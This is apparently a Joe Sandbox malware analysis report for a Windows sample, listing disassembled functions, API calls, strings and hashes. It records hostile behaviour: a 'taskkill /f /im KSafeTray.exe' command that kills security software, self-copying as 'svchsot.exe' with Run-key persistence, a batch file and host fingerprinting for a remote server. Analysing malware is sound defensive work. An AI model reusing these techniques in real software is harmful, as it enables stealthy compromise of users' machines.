                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$CloseHandleThread$Resourcelstrcat$??2@FileSleep$??3@DirectoryExecFindFirstLoadLockModuleMoveNameProcess32SnapshotToolhelp32Windows_strcmpi
                                • String ID: .exe$KSafeTray.exe$LLLLLL$Rstray.exe$SSSSSS$XXXXXX$taskkill /f /im KSafeTray.exe
                                • API String ID: 1427586252-36606792
                                • Opcode ID: 23f35e04005e4586122a6e20164817315ee34bf34b4add223461127f64101a58
                                • Instruction ID: e5db488d9108fed6223139133818c57053fb22d89266da83dd4b914657c10bfb
                                • Opcode Fuzzy Hash: 23f35e04005e4586122a6e20164817315ee34bf34b4add223461127f64101a58
                                • Instruction Fuzzy Hash: 6A31B2B568034576F620EBA08C87FDA3399DB85B84F104914F745BA0C6DBF8F88486B9
                                Function 10002930 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 114stringsleepfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002959
                                • GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002969
                                • lstrcat.KERNEL32(?,1007A0CC), ref: 1000297F
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • lstrcat.KERNEL32(?,00000000), ref: 1000299C
                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 100029A5
                                • Sleep.KERNEL32(00000032), ref: 100029B3
                                • wsprintfA.USER32 ref: 100029E8
                                • lstrcat.KERNEL32(?,\svchsot.exe), ref: 100029F7
                                • MoveFileA.KERNEL32(?,?), ref: 10002A1D
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 10002A32
                                • wsprintfA.USER32 ref: 10002A4A
                                • lstrlen.KERNEL32(?,00000000), ref: 10002A56
                                • Sleep.KERNEL32(000003E8), ref: 10002A7F
                                • FindWindowA.USER32(00000000,1007A204), ref: 10002A88
                                • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 10002A95
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileResourcelstrcat$DirectoryFindSleepwsprintf$??2@??3@CopyCreateLoadLockMessageModuleMoveNamePostWindowWindowslstrlen
                                • String ID: %s\JH.BAT$LLLLLL$Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$XXXXXX$\svchsot.exe
                                • API String ID: 426448433-1350257756
                                • Opcode ID: 6d98c662a98864542062ff972e89dce42718af20c829256efac473ef5170f2d3
                                • Instruction ID: 7e78db92d01b1022693add636c3c748d173f9461a296e18299dfe13d1dc5dce8
                                • Opcode Fuzzy Hash: 6d98c662a98864542062ff972e89dce42718af20c829256efac473ef5170f2d3
                                • Instruction Fuzzy Hash: A531A472144395BBE310DBA4CC85FEB73A9EBC8700F004D1CF38496080EBB9A548CBA6
                                Function 10001380 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 104fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • wsprintfA.USER32 ref: 100013C0
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$File$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWritewsprintf
                                • String ID: GGGGGG$XXXXXX
                                • API String ID: 3303837233-960986945
                                • Opcode ID: cc1146a021282efb5b2e256a42fc67f220187294097d6b15d6d16da5d321ef9b
                                • Instruction ID: ac7a2d40f97e3ef275d1792f4a74c8e88388e2e8796807a1ab99ef5296ea06a1
                                • Opcode Fuzzy Hash: cc1146a021282efb5b2e256a42fc67f220187294097d6b15d6d16da5d321ef9b
                                • Instruction Fuzzy Hash: 9431C7766006046BE318CBB4CC56BEB779AEBC4360F144B2DF667972C1DEE49D088295
                                Function 10001600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 95COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetVersionExA.KERNEL32 ref: 10001624
                                  • Part of subcall function 100012E0: wsprintfA.USER32 ref: 1000132A
                                  • Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001356
                                  • Part of subcall function 100012E0: gethostname.WS2_32(?,?), ref: 1000135E
                                  • Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001365
                                • getsockname.WS2_32 ref: 10001679
                                  • Part of subcall function 10001240: RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
                                  • Part of subcall function 10001240: RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,76F90F00,00000000), ref: 10001280
                                  • Part of subcall function 10001240: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,76F90F00,00000000), ref: 1000128B
                                • GetSystemInfo.KERNEL32(?), ref: 100016B0
                                  • Part of subcall function 100012A0: 6E9B1E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE
                                • GlobalMemoryStatus.KERNEL32 ref: 100016E8
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                  • Part of subcall function 100014B0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
                                  • Part of subcall function 100014B0: FindFirstFileA.KERNEL32(?,?), ref: 10001546
                                  • Part of subcall function 100014B0: CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
                                  • Part of subcall function 100014B0: ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
                                  • Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015B5
                                  • Part of subcall function 100014B0: CloseHandle.KERNEL32(00000000), ref: 100015BB
                                  • Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015CA
                                  • Part of subcall function 10003E30: _ftol.MSVCRT ref: 10003E6F
                                  • Part of subcall function 10003E30: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileResourcewsprintf$??2@CloseFindSystemlstrlen$??3@CreateDirectoryFirstGlobalHandleInfoLoadLockMemoryOpenQueryReadStatusValueVersion_ftolgethostnamegetsockname
                                • String ID: $VVVVVV$f
                                • API String ID: 965855644-510421235
                                • Opcode ID: 64974564b339baab4ba4e779f8b5793599d933840332e7d8fd09318f2be7bc69
                                • Instruction ID: 195f56337f309cec53029e41885cee457b9433af063c58e809775b1897ec5c08
                                • Opcode Fuzzy Hash: 64974564b339baab4ba4e779f8b5793599d933840332e7d8fd09318f2be7bc69
                                • Instruction Fuzzy Hash: 9D3170B55083859FD324CF24C885ADBBBE5FBC8344F008A1DF58983241DB74AA49CBA2
                                Function 1000DDA0 Relevance: 12.1, APIs: 8, Instructions: 133registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 248 1000dda0-1000ddd1 249 1000ddd7 248->249 250 1000deeb-1000df0a call 1000df0b 248->250 251 1000de05-1000de1f RegOpenKeyExA 249->251 252 1000de86-1000dea0 RegOpenKeyExA 249->252 253 1000deb6-1000ded0 RegOpenKeyExA 249->253 254 1000ddde-1000ddff RegCreateKeyExA 249->254 251->250 257 1000de25-1000de2a 251->257 252->250 258 1000dea2-1000deb2 RegDeleteKeyA 252->258 253->250 259 1000ded2-1000dee2 RegDeleteValueA 253->259 254->250 254->251 257->250 260 1000de30-1000de33 257->260 258->250 261 1000deb4 258->261 259->250 262 1000dee4 259->262 263 1000de60-1000de82 RegSetValueExA 260->263 264 1000de35-1000de38 260->264 261->262 262->250 263->250 266 1000de84 263->266 264->250 265 1000de3e-1000de55 RegSetValueExA 264->265 265->250 267 1000de5b 265->267 266->262 267->262
                                APIs
                                • RegCreateKeyExA.KERNEL32(?,00000001,00000000,00000000,00000000,000F003F,00000000,753C8400,753C8400,753C8400,00000000,76F88A60,?,00000000,00000001,?), ref: 1000DDF7
                                • RegOpenKeyExA.KERNEL32(0002001F,00000000,00000000,0002001F,?), ref: 1000DE17
                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000DE4D
                                • RegSetValueExA.KERNEL32(?,00000000,00000000,?,?), ref: 1000DE7A
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000DE98
                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 1000DEAA
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000DEC8
                                • RegDeleteValueA.ADVAPI32(?,?), ref: 1000DEDA
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: OpenValue$Delete$Create
                                • String ID:
                                • API String ID: 2295199933-0
                                • Opcode ID: dfa9c450c80950de0395e4e7346e7bf10f91bfe681af39af305210a63dd43573
                                • Instruction ID: 67a97fe157c163e159881c9215a6b69e3a943ce5662b6e6d27993ba540d2685e
                                • Opcode Fuzzy Hash: dfa9c450c80950de0395e4e7346e7bf10f91bfe681af39af305210a63dd43573
                                • Instruction Fuzzy Hash: FA415DB1600289ABEB10EF95CD84EAFB7BDFB58790B10851AFA19D7184D771ED008B70
                                Function 10003940 Relevance: 10.6, APIs: 7, Instructions: 97networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                  • Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
                                  • Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                  • Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
                                  • Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10
                                • ResetEvent.KERNEL32(?,76F923A0,00000000,?,?,?,?,?,10002644,?,?), ref: 10003953
                                • socket.WS2_32 ref: 10003966
                                • gethostbyname.WS2_32(?), ref: 10003986
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CancelExchangeInterlockedResetclosesocketgethostbynamesetsockoptsocket
                                • String ID:
                                • API String ID: 513860241-0
                                • Opcode ID: f5d5e40a01575f7ff4510ad924051b1898b7209a945d550d58589024808b7694
                                • Instruction ID: 7f2db06767454f243879fc9fac78131effb9a87e5068b181b0692220e83332b6
                                • Opcode Fuzzy Hash: f5d5e40a01575f7ff4510ad924051b1898b7209a945d550d58589024808b7694
                                • Instruction Fuzzy Hash: 9531A375204351BFE320DF68CC85F9BB7E9AF85754F00850DF1999B290DBB198498752
                                Function 10012620 Relevance: 10.6, APIs: 7, Instructions: 53processstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                • ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
                                • Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                • _strcmpi.MSVCRT ref: 10012658
                                • Process32Next.KERNEL32(00000000,00000000), ref: 1001266F
                                • lstrcmpiA.KERNEL32(00000024,?), ref: 1001267A
                                • Process32Next.KERNEL32(00000000,00000000), ref: 10012686
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$??2@CreateFirstSnapshotToolhelp32_strcmpilstrcmpi
                                • String ID:
                                • API String ID: 3655294272-0
                                • Opcode ID: 3acb92f7a082f0560a38fcce033ec22d4c764fcd9f584452c6633fb095ea1df2
                                • Instruction ID: 7b96640b3de945d751338f4a492b60aca70c41a0bc2120e114b52792a7ac63ae
                                • Opcode Fuzzy Hash: 3acb92f7a082f0560a38fcce033ec22d4c764fcd9f584452c6633fb095ea1df2
                                • Instruction Fuzzy Hash: B9F0A4B130135627E6109676AC45EA77BDDCF826E6F011425FA04E9081FB31E96092B5
                                Function 100012E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 288 100012e0-1000135a wsprintfA call 1000d900 lstrlen 291 10001364-10001370 lstrlen 288->291 292 1000135c-1000135e gethostname 288->292 292->291
                                APIs
                                • wsprintfA.USER32 ref: 1000132A
                                  • Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                • lstrlen.KERNEL32(?), ref: 10001356
                                • gethostname.WS2_32(?,?), ref: 1000135E
                                • lstrlen.KERNEL32(?), ref: 10001365
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Opengethostnamewsprintf
                                • String ID: Host$SYSTEM\CurrentControlSet\Services\%s
                                • API String ID: 2381335061-3973614608
                                • Opcode ID: 92b43f06b2ba5dd0f53fd441dc8e5a695e761c9028b70946e1b6b411c71be7b7
                                • Instruction ID: 00a212d8d59931bd4f36ea5daea73ab107ff809958005370ca5a53895ebf1fbb
                                • Opcode Fuzzy Hash: 92b43f06b2ba5dd0f53fd441dc8e5a695e761c9028b70946e1b6b411c71be7b7
                                • Instruction Fuzzy Hash: 2D01F7712003547FF7209224CC55FEB729EEFC8754F008828F74593240D6B56D4586A6
                                Function 10003780 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 293 10003780-10003854 call 100033d0 * 4 WSAStartup CreateEventA
                                APIs
                                  • Part of subcall function 100033D0: RtlInitializeCriticalSection.NTDLL(?), ref: 100033E8
                                • WSAStartup.WS2_32(00000202,?), ref: 100037ED
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100037FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateCriticalEventInitializeSectionStartup
                                • String ID: 0$G$h$s
                                • API String ID: 1327880603-311548548
                                • Opcode ID: 21ddecf2d21aa6d545d3b10116af13633dc4fe99f0d64337955797704fc22f9f
                                • Instruction ID: 055722d880a944932a15ed8300a47e19ec8ef09bbf59dd5dab02bd7fde056146
                                • Opcode Fuzzy Hash: 21ddecf2d21aa6d545d3b10116af13633dc4fe99f0d64337955797704fc22f9f
                                • Instruction Fuzzy Hash: 81216D342097C09EE325CB28C945B87BBD9EB96B14F04895DE4EA472C1CBB96509CB63
                                Function 10009720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                • FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                • LoadResource.KERNEL32(?,00000000), ref: 10009751
                                • LockResource.KERNEL32(00000000), ref: 10009758
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$??2@??3@FindLoadLock
                                • String ID: HOST
                                • API String ID: 472997506-4189257289
                                • Opcode ID: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
                                • Instruction ID: d48a8112f6b242a354970dd34bc60e7fd0122bfa4f1a00ce6be9372c3ccc99b8
                                • Opcode Fuzzy Hash: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
                                • Instruction Fuzzy Hash: 03F0F6F37002102BF600DAB89CCAFAB228DDB85379F040434F704DB281DA659C505262
                                Function 10001240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
                                • RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,76F90F00,00000000), ref: 10001280
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,76F90F00,00000000), ref: 1000128B
                                Strings
                                • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 10001255
                                • ~MHz, xrefs: 1000127A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                • API String ID: 3677997916-2226868861
                                • Opcode ID: 38e8219e42e4db55c2fa6dfb5570c5b58118580aa776850d210d057bb2b41c5a
                                • Instruction ID: 35c208d4d3540590a10e284a9e24e56e80ebe8266937a50f360b862ca68792b9
                                • Opcode Fuzzy Hash: 38e8219e42e4db55c2fa6dfb5570c5b58118580aa776850d210d057bb2b41c5a
                                • Instruction Fuzzy Hash: 10F0F2B8508345BFE300DB64CD88E6BB7E9EBC8708F00CD0CF68982210E674E958CB56
                                Function 00401360 Relevance: 6.1, APIs: 4, Instructions: 106libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • IsBadReadPtr.KERNEL32(00025AE0,00000014), ref: 0040138E
                                • LoadLibraryA.KERNEL32(?), ref: 004013AA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401418
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 0040143F
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Read$AddressLibraryLoadProc
                                • String ID:
                                • API String ID: 2438460464-0
                                • Opcode ID: 27ececaa12b5b765cc8e63b84323d5f545e4a42f36feeac29bab8f0b659a3445
                                • Instruction ID: 0e99147658626de8a4eabd926d73d9b79b83d8c6d3faf898b778abdf7a68cf47
                                • Opcode Fuzzy Hash: 27ececaa12b5b765cc8e63b84323d5f545e4a42f36feeac29bab8f0b659a3445
                                • Instruction Fuzzy Hash: 4631A6727002069BD720CF29DC40A17F7A4FF84364B16453AE91AE77B1E739E815DB94
                                Function 00401A39 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • GetVersion.KERNEL32 ref: 00401A5F
                                  • Part of subcall function 00402F1C: HeapCreate.KERNEL32(00000000,00001000,00000000,00401A98,00000000), ref: 00402F2D
                                  • Part of subcall function 00402F1C: HeapDestroy.KERNEL32 ref: 00402F6C
